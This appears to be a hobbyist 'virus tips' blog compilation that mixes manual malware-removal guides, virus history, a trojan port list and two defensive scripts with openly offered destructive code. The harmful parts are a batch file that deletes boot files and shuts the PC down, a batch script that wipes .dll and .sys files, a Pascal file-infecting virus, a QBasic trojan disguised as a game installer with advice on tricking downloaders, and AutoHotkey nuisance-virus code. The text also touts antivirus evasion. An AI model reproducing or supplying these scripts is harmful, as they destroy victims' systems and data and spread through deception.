Virus Tips & Tricks


Remove the Amvo.exe !!

First of all, we must know what amvo.exe is, what the symptoms are when we have amvo.exe on our PC, and how to remove it manually without using any software. OK, here we go!

What is Amvo.exe?

* Amvo.exe is a Trojan/Backdoor

Symptoms

* Folder Options is not working - you cannot open Folder Options or show the hidden files on your computer.
* Hidden file problem
* Drives always open in a new window
* Memory reference errors occur (Low Disk Space)

How to solve this?

This is how to remove amvo.exe and fix the Folder Options problem. Just follow these steps:

1. Uncheck amvo.exe in msconfig >> Startup (type msconfig in Run and click on the Startup tab), then restart your system.

2. Click Start > Run and type REGEDIT

3. Go to HKEY_CURRENT_USER > SOFTWARE > Microsoft > Windows > CurrentVersion > Explorer > Advanced

4. On the right side, double-click the Hidden value and give it a value of 1.

5. Do the same for HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Explorer > Advanced > Folder > Hidden > SHOWALL: change the value of CheckedValue to 1.

6. Check whether Folder Options is working now. If it works, you are ready to delete the Amvo.exe virus.

Go to Folder Options, enable showing all hidden files, and remove the following files if they exist in the exact location or directory:

c:\autorun.inf
c:\u.bat
c:\amvo.exe
c:\awda2.exe
c:\d.com
c:\mvo.dll
c:\amvo1.dll
c:\windows\system32\amvo.exe
c:\windows\system32\awda2.exe
c:\windows\system32\d.com
c:\windows\system32\mvo.dll
c:\windows\system32\amvo1.dll
c:\windows\system32\u.bat


Lastly, go to Run and type cmd, then type regedit, press Ctrl + F to find amvo.exe and delete it. After that, reboot your PC.

How to remove Funny UST Scandal.avi.exe Virus Manually !!

1. First, end the processes run by the virus:

a. killer.exe, b. lsass.exe, c. smss.exe

Note: close all processes that have the same icon as Funny UST Scandal.avi.exe

2. Open Start >> Run and type cmd (without quotes) and press enter.
3. The above command will open the command prompt; type cd\ (without quotes)
4. Type attrib -h -s smss.exe (without quotes)
5. Type attrib -h -s autorun.inf (without quotes)
6. Repeat step 4 and 5 for all the drives through command prompt (on the root folder)

7. Now open all your drives one by one by typing C:, D: and so on in the address bar at the top, and delete smss.exe, autorun.inf and Funny UST Scandal.avi.exe

8. Open command prompt again by following step 2.
9. Type cd c:\windows (without quotes)
10. Type attrib -h -s smss.exe (without quotes) and press enter. Type del smss.exe and press enter, then type del lsass.exe and press enter.
11. Now Open Start >> Run and type regedit and press enter.
12. Locate these paths one by one in the registry.

* HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
* HKCU\Software\Microsoft\windows\Currentversion\Run\Runonce

At these paths, locate the keys which have values as (killer.exe) and (c:\windows\smss.exe). Delete these registry keys.



How to Remove Disk Knight Virus !!

1. Temporarily Disable USB Drive to auto run (Windows XP):

a. Open Windows Explorer or press the Windows + “e” key.
b. Right-click the drive of the USB Drive. Then select Properties. Drive Properties will appear.
c. Select the AutoPlay tab.
d. Choose Select an Action to Perform
e. At the bottom of the selection, click Take no Action, then click Apply.
f. Click OK to exit Drive Properties.

2. Show Hidden Files

a. Open Windows Explorer
b. Go to Tools > Options
c. On the View tab, check “Show Hidden Files and Folders” and uncheck “Hide Protected Operating System Files”.

3. Delete the files manually
a. Go to the USB Drive and delete autorun.inf
b. Go to C: Drive and delete autorun.inf
c. Go to C:\Windows and delete Disk Knight.exe

4. Modify Windows Registry
a. Go to Start > Run then type regedit
b. On Registry Editor, go to Edit > Find and type “knight”
c. Delete all entries it found.

5. Connect to Internet and update your AntiVirus

6. Reboot your computer in Safe Mode
a. During Boot Up process Press F8 continuously until selection appears
b. Use Arrow Up Down to select Safe Mode on the selections menu.
c. Hit Enter to proceed.

7. Scan your computer with an updated Antivirus and delete all infections it finds.

Note: You may enable auto run of the USB Drive by reversing the process in Step 1.

HOW TO Remove NTDETEC1.exe !!

If you’re using the Operating System called Windows, chances are that you might have already come across the ntdetec1.exe virus. Or you will, sooner or later.

Its official name is W32.Ceted and it is a worm that copies itself to all shared and removable drives and spreads when the user double clicks on it to open it. If a system is infected, it creates a folder called ntdetec1 in your System Drive which is NOT visible via Explorer or Command prompt.

Related files:
\ntdetec1\ntdetec1.exe
\ntdetec1\cmrss.exe
\ntdetec1\run.exe
\ntdetec1\shell32.exe
\ntdetec1\drivelist.txt
\ntdetec1\child\autorun.inf
\ntdetec1\child\ntdetec1.exe

Symptoms:
1. Task Manager closes as soon as it launches.
2. RegEdit may be inaccessible
3. Folder Options may be inaccessible

When I scanned using some anti-virus software, Nod32, Symantec AV Corporate, McAfee and AVG failed to detect the files, even in Safe Mode.

To remove it, run the following commands at the command prompt:

taskkill /im cmrss.exe
taskkill /im ntdetec1.exe
taskkill /im shell32.exe

Now, make sure you are in the root drive of your system. For example, if your Windows is installed in C:, make sure your prompt shows C:\>
Now, run the command:

attrib ntdetec1 -s -h -r /s /d
(s->system,h->hidden,r->read only)

This will make the folder visible in explorer. Now you can Shift+Delete the folder from explorer.

Also, you might need to delete the following registry key (if it is present)

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\"winlogon" = "C:\ntdetec1\run.exe"

Congratulations, this will remove all known traces of the above worm.
And remember, next time you use someone’s PD, before you access it, go to your command prompt and delete the autorun.inf file, if any.
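
The removal steps above all end with deleting autorun.inf from a drive root. As an added example (not part of the original page), this Python script reads the text of an autorun.inf before it is deleted and reports which commands it would have launched. The sample file contents and the function names are constructed for illustration; the file names it matches are the ones listed in the removal steps on this page.

```python
import re

# Keys in the [autorun] section whose value is a command that Windows runs, or
# offers in the drive's context menu, when the drive is opened.
COMMAND_KEYS = {"open", "shellexecute"}
SHELL_VERB_RE = re.compile(r"^shell\\[^\\]+\\command$")
EXECUTABLE_EXTS = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".dll", ".vbs")
TARGET_RE = re.compile(
    r"^(.*?\.(?:exe|com|bat|cmd|scr|pif|dll|vbs))(?=\s|$)", re.IGNORECASE
)

# File names taken from the removal steps on this page.
NAMES_FROM_PAGE = {
    "amvo.exe", "awda2.exe", "d.com", "u.bat",
    "smss.exe", "ntdetec1.exe", "disk knight.exe",
}

# Constructed sample inputs (not captured from a real infection).
SAMPLE_INFECTED = (
    ";kd93jslk2 padding line\n"
    "[AutoRun]\n"
    "open=amvo.exe\n"
    "x9fj2\n"
    "shell\\open\\Command=amvo.exe\n"
    'shell\\explore\\Command="d.com" -e\n'
    "jdk3=92k\n"
)
SAMPLE_BENIGN = "[autorun]\nicon=setup.ico\nlabel=Backup Disk\n"


def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lower-cased.

    Comment lines and padding lines without '=' are skipped, so junk
    inserted between the real entries does not hide them.
    """
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def command_target(value):
    """Return the lower-cased file name a command value points at."""
    value = value.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        path = value[1:end] if end != -1 else value[1:]
    else:
        match = TARGET_RE.match(value)
        if match:
            path = match.group(1)          # handles names containing spaces
        else:
            parts = value.split()
            path = parts[0] if parts else ""
    return re.split(r"[\\/]", path)[-1].lower()


def triage_autorun(text):
    """List every command-bearing entry that launches an executable."""
    findings = []
    for key, value in parse_autorun(text).items():
        if key not in COMMAND_KEYS and not SHELL_VERB_RE.match(key):
            continue
        target = command_target(value)
        reasons = []
        if target.endswith(EXECUTABLE_EXTS):
            reasons.append("launches executable")
        if target in NAMES_FROM_PAGE:
            reasons.append("file name listed on this page")
        if reasons:
            findings.append(
                {"key": key, "command": value, "target": target, "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for finding in triage_autorun(SAMPLE_INFECTED):
        print(finding["key"], "->", finding["command"], finding["reasons"])
```

Keeping a copy of the reported targets before deleting autorun.inf tells you which files to look for on the drive root and under the Windows directory.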


Worst Computer Viruses Of All Time!!

1. Brain, 1986
It all started here: Brain was the first "real" virus ever discovered, back in 1986. Brain didn't really hurt your PC, but it launched the malware industry with a bang and gave bad ideas to over 100,000 virus creators for the next 2 decades.

2. Michelangelo, 1991
The worst MS-DOS virus ever, Michelangelo attacked the boot sector of your hard drive and any floppy drive inserted into the computer, which caused the virus to spread rapidly. After spreading quietly for months, the virus "activated" on March 6, and promptly started destroying data on tens of thousands of computers.

3. Melissa, 1999
Technically a worm, Melissa (named after a stripper) collapsed entire email systems by causing computers to send mountains of messages to each other. The author of the virus was eventually caught and sentenced to 20 months in prison.

4. ILOVEYOU, 2000
This was notable for being one of the first viruses to trick users into opening a file, which in this case claimed to be a love letter sent to the recipient. In reality, the file was a VBS script that sent mountains of junk mail and deleted thousands of files. The results were terribly devastating: one estimate holds that 10 percent of all computers were affected, to a cost of $5.5 billion. It remains perhaps the worst worm of all time.

5. Code Red, 2001
An early "blended threat" attack, Code Red targeted Web servers instead of user machines, defacing websites and later launching denial-of-service attacks on a host of IP addresses, including those of the White House.

6. Nimda, 2001
Built on Code Red's attack system of finding multiple avenues into machines (email, websites, network connections, and others), Nimda infected both Web servers and user machines. It found paths into computers so effectively that, 22 minutes after it was released, it became the Internet's most widespread virus at the time.

7. Klez, 2001
An email virus, Klez pioneered spoofing the "From" field in email messages it sent, making it impossible to tell if Bill Gates did or did not really send you that information about getting free money.

8. Slammer, 2003
Another fast spreader, this worm infected about 75,000 systems in just 10 minutes, slowing the Internet to a crawl (much like Code Red) and shutting down thousands of websites.

9. MyDoom, 2004
Notable as the fastest-spreading email virus of all time, MyDoom infected computers so they would, in turn, send even more junk mail. In a strange twist, MyDoom was also used to attack the website of SCO Group, a very unpopular company that was suing other companies over its code being used in Linux distributions.

10. Storm, 2007
The worst recent virus, Storm spread via email spam with a fake attachment and ultimately infected up to 10 million computers, causing them to join its zombie botnet.


Virus that crashes your own pc !!

Open Notepad and paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c: Drive

Save it as a .bat file on your PC.

This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!

Type this in notepad

Start virus.bat
virus.bat

and save as with this name

virus.bat

Your antivirus will not detect this virus.

Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d

Different Kinds Of Trojans !!

Remote Access Trojans


These trojans are the most popular trojans now. Everyone wants to have such a trojan because he or she wants to have access to the victim's hard drive. The RATs (remote access trojans) are very simple to use. Just make someone run the server and you get the victim's IP and you have FULL access to his or her computer. Then you can do almost everything; it depends on the trojan you use. But the RATs have the common remote access trojan functions like: keylogger, upload and download function, make a screenshot and so on. Some people use the trojans for malicious purposes. They want just to delete and delete. This is lame. There are many programs out there that detect the most common trojans, but new trojans are coming every day and these programs are not the maximum defense.

The trojans always do the same things. If the trojan restarts every time Windows is loaded, that means it put something in the registry or in win.ini or in another system file so the trojan can restart. Also, the trojans create some file in the WINDOWS\SYSTEM directory. The file always looks like something that the victim will think is a normal WINDOWS executable. Most trojans hide from the Alt+Ctrl+Del menu. This is not good because there are people who use only this way to see which processes are running. There are programs that will tell you exactly the process and the file it comes from. Yeah, but some trojans, as I told you, use fake names and it's a little hard for some people to understand which process they should kill.

The remote access trojans open a port on your computer, letting everyone connect. Some trojans have options like changing the port and setting a password so only the guy that infected you will be able to use the computer. The change port option is very good because I'm sure you don't want your victim to see that port 31337 is open on their computer. Remote access trojans are appearing every day and they will continue to appear. For those that use such trojans: BE CAREFUL, you can infect yourself and then the victim you wanted to destroy will take revenge and you'll be sorry.
---------------------------------------
Password Sending Trojans

The purpose of these trojans is to rip all cached passwords and send them to a specified e-mail address without letting the victim know about the e-mail. Most of these trojans don't restart every time Windows is loaded, and most of them use port 25 to send the e-mail. There are such trojans that e-mail other information too, like ICQ number, computer info and so on. These trojans are dangerous if you have any passwords cached anywhere on your computer.
----------------------------------------
Keyloggers

These trojans are very simple. The only thing they do is log the keys that the victim is pressing and then check for passwords in the log file. In most cases these trojans restart every time Windows is loaded. They have options like online and offline recording. In online recording they know that the victim is online and they record everything. But in offline recording everything written after Windows starts is recorded and saved on the victim's disk, waiting to be transferred.
----------------------------------------
Destructive

The only function of these trojans is to destroy and delete files. This makes them very simple and easy to use. They can automatically delete all your .dll or .ini or .exe files on your computer. These are very dangerous trojans, and once you're infected, be sure that if you don't disinfect, your computer information will no longer exist.
-----------------------------------------
FTP trojans

These trojans open port 21 on your computer, letting EVERYONE that has an FTP client connect to your computer without a password and with full upload and download options.


These are the most common trojans. They are all dangerous and you should be careful using them.
--------------------------------------
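
The section above notes that remote access trojans open a listening port and may run under a fake process name. As an added example (not part of the original page), this Python script reads saved netstat -ano output and flags TCP listeners whose port appears in the trojan port list further down this page. The netstat sample is constructed, English-language netstat output is assumed, and a match is only a prompt to check the owning PID, since ports such as 21, 3128 and 8000 are also used by ordinary software.

```python
# Excerpt of the "List of Trojan Ports" further down this page, plus two ports
# named in the trojan descriptions above (21 and 31337).
PAGE_PORTS = {
    21: ["FTP trojans (described above)"],
    1243: ["Subseven.100", "SubSeven.110", "SubSeven.180", "SubSeven.190", "Subseven.200"],
    3128: ["MastersParadise.970"],
    8000: ["XConsole.100"],
    12345: ["Fade.100", "Netbus.160", "Netbus.170", "VagrNocker.400"],
    27374: ["Muerte.110", "Subseven.210", "SubSeven.213"],
    31337: ["port named in the text above"],
}

# Listed ports that ordinary software (FTP servers, proxies, web servers) also
# commonly listens on; a hit here says little until the process is identified.
COMMONLY_LEGITIMATE = {21, 3128, 8000}

# Constructed sample of `netstat -ano` output (not from a real machine).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING       5120
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING       2312
  TCP    192.168.1.20:49712     203.0.113.5:27374      ESTABLISHED     4100
  TCP    [::]:12345             [::]:0                 LISTENING       2312
  UDP    0.0.0.0:500            *:*                                    700
"""


def listening_tcp_ports(netstat_text):
    """Yield (port, pid) for every TCP listener in `netstat -ano` output."""
    for line in netstat_text.splitlines():
        fields = line.split()
        # TCP rows have exactly: proto, local, foreign, state, pid.
        if len(fields) != 5 or fields[0].upper() != "TCP":
            continue
        _, local, _, state, pid = fields
        if state.upper() != "LISTENING":
            continue  # only the local listening port matters here
        port = local.rsplit(":", 1)[-1]  # works for 0.0.0.0:135 and [::]:135
        if port.isdigit() and pid.isdigit():
            yield int(port), int(pid)


def flag_listeners(netstat_text):
    """Return listeners on listed ports, one entry per (port, pid) pair."""
    hits = {}
    for port, pid in listening_tcp_ports(netstat_text):
        if port in PAGE_PORTS:
            hits[(port, pid)] = {
                "port": port,
                "pid": pid,
                "listed_as": PAGE_PORTS[port],
                "also_common_legitimate": port in COMMONLY_LEGITIMATE,
            }
    return [hits[key] for key in sorted(hits)]


if __name__ == "__main__":
    for hit in flag_listeners(SAMPLE_NETSTAT):
        note = " (also a common legitimate port)" if hit["also_common_legitimate"] else ""
        print(f"port {hit['port']} pid {hit['pid']}{note}: {', '.join(hit['listed_as'])}")
        # Next step for the analyst: tasklist /FI "PID eq <pid>" and check the file path.
```

The established connection to remote port 27374 in the sample is deliberately not flagged, because the check looks only at ports the local machine is listening on.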

Removing Orkut Virus !!

Many members of Orkut are suffering from this virus, Muhaha, and it says something like "you are banned" and so on, so here is how to remove it.

It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file). If your PC is infected by this virus, just boot it in safe mode, go to the cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible, and then just delete this folder. Either go with a registry cleaner to remove it, or here is the easiest method.


Open Task Manager > Processes tab. If you find svchost.exe there before your user name (remember, the system also uses svchost.exe; don't end that), just end the process for that one, then go to Run, type C:\heap41a and delete all files in that folder.

Here Is the Code of that Virus >>

ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{

Making .dll .sys virus!!

This virus is undetectable by antivirus scanners.
Open Notepad and paste this code:
Code:
 @Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys
This will delete all .dll and .sys files. Change it the way you want, like:
Code:
 @Echo off  c:  cd %WinDir%\System\  deltree /y *.psw  cd\  deltree /y *.exe

Virus Code in Pascal !!

It's a new virus code.
It's created in Pascal.
Copy and paste it in Notepad as anyname.pas

Program Saddam;

{$M 10000,0,0}

Uses
DOS;

Var
DriveID : String [2];
Buffer : Array [1..8000] Of Byte;
Target,Source : File;
Infected : Byte;
Done : Word;
TargetFile : String;

(*??????????????????????????????????????

???????????????????????????????????*)

Function ExistCom : Boolean;
Var
FindCom : SearchRec;
Begin
FindFirst ( TargetFile, 39, FindCom );
ExistCom := DosError = 0;
End;



Procedure SearchDir ( Dir2Search : String );
Var
S : SearchRec;

Begin

If Dir2Search [ Length ( Dir2Search ) ] <> '\' Then
Dir2Search := Dir2Search + '\';



FindFirst ( Dir2Search + '*.exe', 39, S );

While DosError = 0 Do
Begin

TargetFile := Copy ( Dir2Search + S.Name,1,
Length ( Dir2Search + S.Name ) -3 ) + 'com';

If ( Copy ( S.Name, Length ( S.Name ) -2,3 ) = 'EXE' ) And
Not ExistCom And ( Infected <> 25000 ) Then
Begin
{$i-}
Inc ( Infected );
Assign ( Target, TargetFile );
Rewrite ( Target,1 );
BlockWrite ( Target, Buffer, Done + Random ( 4400 ));
SetFTime ( Target, S.Time );
Close ( Target );
If IoResult = 101 Then
Begin
Infected := 3;
Erase ( Target );
End;

{$i+}
End;

FindNext ( S );
End;

FindFirst ( Dir2Search + '*', Directory, S );

If S.Name = '.' Then
Begin
FindNext ( S );
FindNext ( S );
End;

If ( DosError = 0 ) And
( S.Attr And 16 <> 16 ) Then
FindNext ( S );

While DosError = 0 Do
Begin
If ( S.Attr And 16 = 16 ) And ( Infected < 3 ) Then
SearchDir ( Dir2Search + S.Name );
FindNext ( S );
End;
End;


Begin

DriveID := FExpand ( ParamStr ( 1 ));
Infected := 0;


Assign ( Source, ParamStr ( 0 ) );
Reset ( Source, 1 );
BlockRead ( Source, Buffer, 5000, Done );
Close ( Source );

Randomize;

SearchDir ( DriveID );

Exec ( Copy ( ParamStr ( 0 ),1,
Length ( ParamStr ( 0 )) -3 ) + 'exe', ParamStr ( 1 ) );


End.


*** NOT FOR GENERAL DISTRIBUTION ***

• This File is for the Purpose of Virus Study Only! It Should not be Passed
• Around Among the General Public. It Will be Very Useful for Learning how
• Viruses Work and Propagate. But Anybody With Access to an Assembler can
• Turn it Into a Working Virus and Anybody With a bit of Assembly Coding
• Experience can Turn it Into a far More Malevolent Program Than it Already
• Is. Keep This Code in Responsible Hands!

Write your Own trojan!!!

This is a little trojan written in Qbasic 4.5

REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"

How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!

What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d:




All About Worms !!

A worm is a computer program that has the ability to copy itself from machine to machine. Worms are basically malicious code, like viruses or Trojans. They often have some sort of evil intent, and they mainly use up computer time and network bandwidth when they are replicating.

Unlike a virus, a worm does not need to attach itself to an existing program. Worms always harm the network (if only by consuming bandwidth), whereas viruses always infect or corrupt files on a targeted computer. Worms can expand from a single copy incredibly quickly.

A worm usually exploits some sort of security hole or some bug in the software or the OS. Some famous worms are Mydoom, Sobig (both spreading via email) and Code Red (affecting whitehouse.gov).


Types of Viruses!!

Viruses are classified mainly based on what they affect, how they affect it, and size.

Based on what they affect


Computer virus.
Mobile virus - Nowadays many viruses are written for mobiles. They spread through GPRS/Bluetooth.
Music player virus - There exist only a handful of such viruses. They spread when you add a song/video or download something.

Based on size

Tiny virus - These are under 500 bytes. They are designed to be undetectable due to their small size. TINY is one such virus. They are generally very simple because their code length is so limited.
Large virus - They are over 1,500 bytes. They are designed to be undetectable because they cover their tracks very well (all that code DOES have a use!). The best example of this is the Whale virus, which is perhaps the best 'stealth' virus in existence.
Other virus - These viruses are easily detectable. Many viruses are of this type.

Based on how they affect
All of these may seem like computer viruses only, but that is only partly true, as your mobile too has an OS.

Boot Sector Virus: This virus replaces or implants itself in the boot sector---an area of the hard drive (or any other disk) accessed when you first turn on your computer. This kind of virus can prevent you from being able to boot your hard disk.

File Virus: This infects your applications. These then spread the virus by infecting other applications. You need to run or open these files.


Macro Virus: These account for about 75 percent of viruses found in the wild. Written using a simplified macro programming language, these viruses affect Microsoft Office applications, such as Word and Excel, and . A document infected with a macro virus generally modifies a pre-existing, commonly used command (such as Save) to trigger its payload upon execution of that command.


Multipartite Virus: These infect both files and the boot sector, and can infect your system dozens of times before being caught.


Polymorphic Virus: A well-written virus of this type is usually difficult for antivirus scanners to detect, but these are usually not that well written. They change their code whenever they pass to another machine.


Stealth Virus: These hide their presence by making an infected file not appear infected, but don't usually stand up to antivirus software.


Remove Brontok Virus Yourself

Start your computer in safe mode with command prompt and type the following command to enable the registry editor:

reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
and run the same command for HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"

After this your registry editor is enabled.
Type explorer
Go to Run and type regedit
Then follow this path:
HKLM\Software\Microsoft\Windows\Currentversion\Run

On the right side, delete the entries which contain the words 'Brontok' and 'Tok-'.

After that, restart your system.
Open the registry editor and follow this path to enable Folder Options in the Tools menu:

HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ 'NoFolderOptions'
Delete this entry and restart your computer.

Then search for *.exe files in all drives (search in hidden files also)
and remove all files that are displayed with a folder icon.

Your computer is now completely free from the Brontok virus.

Install Xp From Dos!!!!!

If XP is not installing from the CD, or if you have a new drive with no operating system on it yet, try these:

Install Windows XP from the hard drive with Windows 98 already installed:

Boot Windows 98
Insert the XP CD into your CD reader
Explore Windows XP through My Computer
Copy i386 folder to C:\
Go into C:\i386 folder and double click on winnt32.exe to launch the setup from the hard drive

Install Windows XP from DOS (ie. no OS on a new hard drive):

Boot with a Windows 98 Start Up disk
Insert the Windows 98 CD into the CD reader
Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching)
Type cd.. to back up to the root directory
Insert Windows XP CD into the CD reader
Copy the i386 folder to C:\
Go into C:\i386 folder on C: and type winnt.exe to launch the setup from the hard drive.

List of Trojan Ports!!!!!!!

TCP 1 Breach.2001, SocketsDeTroie.230, SocketsDeTroie.250
TCP 28 Amanda.200
TCP 31 MastersParadise.920
TCP 68 Subseven.100
TCP 142 NetTaxi.180
TCP 146 Infector.141, Intruder.100, Intruder.100
TCP 171 ATrojan.200
TCP 285 WCTrojan.100
TCP 286 WCTrojan.100
TCP 334 Backage.310
TCP 370 NeuroticKat.120, NeuroticKat.130
TCP 413 Coma.109
TCP 420 Breach.450
TCP 555 Id2001.100, PhaseZero.100, StealthSpy.100
TCP 623 Rtb666.160
TCP 660 Zaratustra.100
TCP 661 Noknok.800, Noknok.820
TCP 666 BackConstruction.210, BackConstruction.250, Bla.100, Bla.200, Bla.400, Bla.503, Cain.150, Dimbus.100, Noknok.820, Ripper.100, SatansBackdoor.100, SatansBackdoor.101, SatansBackdoor.102, Unicorn.100, Unicorn.101, Unicorn.110
TCP 667 SniperNet.210, Snipernet.220
TCP 668 Unicorn.101, Unicorn.110
TCP 680 Rtb666.160
TCP 777 Tiny.100, Undetected.230, Undetected.300, Undetected.310, Undetected.320, Undetected.330, Undetected.331, Undetected.332
TCP 785 NetworkTerrorist.100
TCP 800 NeuroticKitten.010
TCP 831 NeuroticKat.100, NeuroticKat.120, NeuroticKat.130
TCP 901 NetDevil.130, NetDevil.140
TCP 1000 DerSpaeher.200
TCP 1001 Silencer.100
TCP 1008 AutoSpy.100
TCP 1010 DerSpaeher.200
TCP 1015 Doly.150
TCP 1111 TPort.100
TCP 1130 Noknok.800, Noknok.820
TCP 1207 SoftWAR.100
TCP 1243 Subseven.100, SubSeven.110, SubSeven.180, SubSeven.190, Subseven.200
TCP 1245 VoodooDoll.006
TCP 1269 Matrix.130
TCP 1480 RemoteHack.130
TCP 1568 RemoteHack.100, RemoteHack.110
TCP 1600 DirectConnection.100
TCP 1601 DirectConnection.100
TCP 1602 DirectConnection.100
TCP 1634 NetCrack.100
TCP 1784 Snid.120, Snid.212
TCP 1999 TransmissionScout.100, TransmissionScout.110
TCP 2000 ATrojan.200, InsaneNetwork.400
TCP 2001 DIRT.220, TrojanCow.100
TCP 2003 TransmissionScout.100, TransmissionScout.110
TCP 2023 RipperPro.100
TCP 2040 InfernoUploader.100
TCP 2115 Bugs.100
TCP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
TCP 2332 SilentSpy.202
TCP 2589 Dagger.140
TCP 2600 DigitalRootbeer.100
TCP 2989 Rat.200
TCP 3128 MastersParadise.970
TCP 3129 MastersParadise.920, MastersParadise.970
TCP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
TCP 3215 BlackStar.100, Ghost.230
TCP 3333 Daodan.123
TCP 3410 OptixPro.100, OptixPro.110
TCP 3456 Force.155, TerrorTrojan.100
TCP 3505 AutoSpy.130, AutoSpy.140
TCP 3586 Snid.120, Snid.212
TCP 3700 PortalOfDoom.100
TCP 3723 Mantis.100
TCP 3800 Eclypse.100
TCP 3996 RemoteAnything.364
TCP 4000 SkyDance.220, SkyDance.229
TCP 4201 Wartrojan.160, Wartrojan.200
TCP 4225 SilentSpy.202
TCP 4321 Bobo.100
TCP 4444 AlexTrojan.200, Crackdown.100
TCP 4488 EventHorizon.100
TCP 4523 Celine.100
TCP 4545 InternalRevise.100, RemoteRevise.150
TCP 4567 FileNail.100
TCP 4666 Mneah.100
TCP 4950 ICQTrojan.100
TCP 5005 Aladino.060
TCP 5025 Keylogger.WMRemote.100
TCP 5031 NetMetro.104
TCP 5032 NetMetro.104
TCP 5033 NetMetro.104
TCP 5050 RoxRat.100
TCP 5151 OptixLite.020, OptixLite.030, OptixLite.040
TCP 5190 MBomber.100
TCP 5277 WinShell.400
TCP 5343 WCRat.100
TCP 5400 BackConstruction.120, BackConstruction.150, BladeRunner.080, DeepThroat.300
TCP 5401 BackConstruction.120, BackConstruction.150, BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5402 BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5534 TheFlu.100
TCP 5550 XTCP.200, XTCP.201
TCP 5555 Noxcape.100, Noxcape.200
TCP 5695 Assassin.100
TCP 5714 WinCrash.100
TCP 5741 WinCrash.100
TCP 5742 WinCrash.103
TCP 5802 Y3KRat.160
TCP 5810 Y3KRat.160
TCP 5838 Y3KRat.170
TCP 5858 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5880 Y3KRat.140
TCP 5881 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5883 Y3KRat.110, Y3KRat.140
TCP 5884 Y3KRat.140, Y3KRat.150
TCP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5886 Y3KRat.120, Y3KRat.140
TCP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5889 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5890 Y3KRat.140
TCP 6400 Thething.100, Thething.150
TCP 6556 AutoSpy.120, AutoSpy.122
TCP 6655 Aqua.020
TCP 6660 LameSpy.095
TCP 6666 LameRemote.100, ProjectMayhem.100
TCP 6669 Vampire.100
TCP 6670 DeepThroat.200, DeepThroat.210
TCP 6671 DeepThroat.310
TCP 6699 HostControl.101
TCP 6711 DeepThroat.300, Noknok.820, SubSeven.180, SubSeven.190
TCP 6712 Subseven.100
TCP 6713 Subseven.100
TCP 6767 NTRC.120
TCP 6776 SubSeven.180, SubSeven.190, Subseven.200
TCP 6789 Doly.200
